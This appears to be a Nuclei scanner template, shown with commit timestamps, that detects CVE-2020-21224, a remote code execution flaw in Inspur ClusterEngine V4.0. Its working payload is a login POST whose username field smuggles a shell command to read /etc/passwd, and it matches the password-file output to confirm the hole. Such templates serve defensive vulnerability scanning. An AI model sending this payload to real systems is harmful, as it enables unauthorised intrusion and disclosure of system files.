2021-03-03 13:44:11 +00:00
id : CVE-2020-21224
info :
2021-03-03 20:26:35 +00:00
name : Inspur ClusterEngine V4.0 RCE
2021-03-03 13:44:11 +00:00
author : pikpikcu
severity : critical
2021-03-24 06:50:41 +00:00
description : A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server
2021-03-03 13:44:11 +00:00
reference : https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
tags : cve,cve2020,clusterengine,rce
requests :
- method : POST
path :
2021-03-16 10:38:58 +00:00
- "{{BaseURL}}/login"
headers :
2021-03-17 09:56:31 +00:00
Content-Type : application/x-www-form-urlencoded
Referer : "{{Hostname}}/module/login/login.html"
2021-03-16 10:38:58 +00:00
body : |
2021-03-17 09:56:31 +00:00
op=login&username=;`cat /etc/passwd`&password=
2021-03-03 13:44:11 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-03-03 13:44:11 +00:00
part : body
- type : status
status :
2021-03-16 10:38:58 +00:00
- 200